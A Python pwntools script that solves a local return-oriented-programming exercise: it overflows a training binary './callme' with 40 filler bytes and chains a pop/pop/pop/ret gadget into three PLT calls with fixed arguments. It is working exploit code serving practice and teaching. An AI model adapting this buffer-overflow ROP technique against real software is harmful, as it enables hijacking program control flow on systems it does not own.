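#!/usr/bin/env python3
"""Local ROP-chain exercise against the training binary ``./callme``.

The script writes 40 filler bytes followed by three call sequences, each of
which loads rdi/rsi/rdx from the stack with one pop/pop/pop/ret gadget and
then returns into one of the callme PLT stubs.  Every address below was read
from this specific build of ``./callme`` and has no meaning for any other
binary; the 0x4000xx values look like fixed (non-PIE) text addresses, so a
relocatable build would invalidate them -- confirm against the binary.
"""
from pwn import *

# pop rdi ; pop rsi ; pop rdx ; ret
usefulGadgets = p64(0x000000000040093c)

# The three arguments handed to each callme_N(), in register order.
arg1 = p64(0xdeadbeefdeadbeef)  # -> rdi
arg2 = p64(0xcafebabecafebabe)  # -> rsi
arg3 = p64(0xd00df00dd00df00d)  # -> rdx

# PLT stubs for callme_one/two/three as resolved in this build.
callme_1_plt = p64(0x0000000000400720)
callme_2_plt = p64(0x0000000000400740)
callme_3_plt = p64(0x00000000004006f0)


def _call_with_args(plt_entry):
    """Return one chain fragment: load the three argument registers, then call *plt_entry*.

    The fragment is gadget + arg1 + arg2 + arg3 + PLT address, i.e. exactly the
    layout the pop/pop/pop/ret gadget consumes before its final ``ret``.
    """
    return usefulGadgets + arg1 + arg2 + arg3 + plt_entry


# 40 filler bytes precede the first gadget address in this build.
padding = b'a' * 40

payload = padding
payload += _call_with_args(callme_1_plt)
payload += _call_with_args(callme_2_plt)
payload += _call_with_args(callme_3_plt)
# The explicit newline is kept for parity with the original chain; sendline()
# below appends a second one, so the target sees two line terminators.
payload += b"\n"

prog = process('./callme')
try:
    prog.sendline(payload)
    # A single timed recv() is timing-dependent: output produced after the
    # pause, or in more than one chunk, is not collected.
    sleep(1)
    print(prog.recv().decode('UTF-8'))
finally:
    prog.close()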